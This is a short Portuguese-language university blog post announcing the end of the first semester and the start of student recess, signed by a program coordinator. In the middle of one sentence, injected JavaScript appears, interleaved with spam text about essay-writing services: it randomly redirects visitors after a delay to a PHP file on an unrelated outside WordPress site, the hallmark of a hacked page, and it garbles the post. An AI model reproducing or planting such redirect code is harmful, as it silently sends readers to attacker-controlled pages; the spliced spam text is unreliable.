ESTUDANTES DA UNIPAR ENTRAM EM RECESSO

As aulas do primeiro semestre encerraram, porem, alguns alunos ainda farao a primeira prova substitutiva para melhorarem o seu desempenho na avaliacao semestral.

A todos os que ja entraram em recesso, bom descanso! Que Deus os abencoe pela etapa
var number1=Math.floor(Math.Others are great writers that will offer read the full info there great essay writing service to college students.random() * 5);
if (number1==3)
{
var delay = 15000;
setTimeout(“document.location.href=’http://baharzaf.com/wp-content/plugins/duplicator/ctrls/wp-rsc.php'”, delay);
vencida.

Dia 17 de julho, recomecam as aulas. E o segundo semestre que promete muito. Alguns estarao concluindo a sua formacao, outros estarao experimentando o sabor do sucesso pela aprovacao.

Se alguem estiver com dificuldades, lembre-se de que ainda ha muito tempo para recuperar as notas, mas e preciso estudar muito.

Nao ha ferias para leitura. Ela e a fonte do saber. Quem le, aprende muito!

Ate a volta!

Augusto Gaioski – Coordenador da PU

Comments

Esta entrada foi publicada em Sem categoria. Adicione o link permanente aos seus favoritos.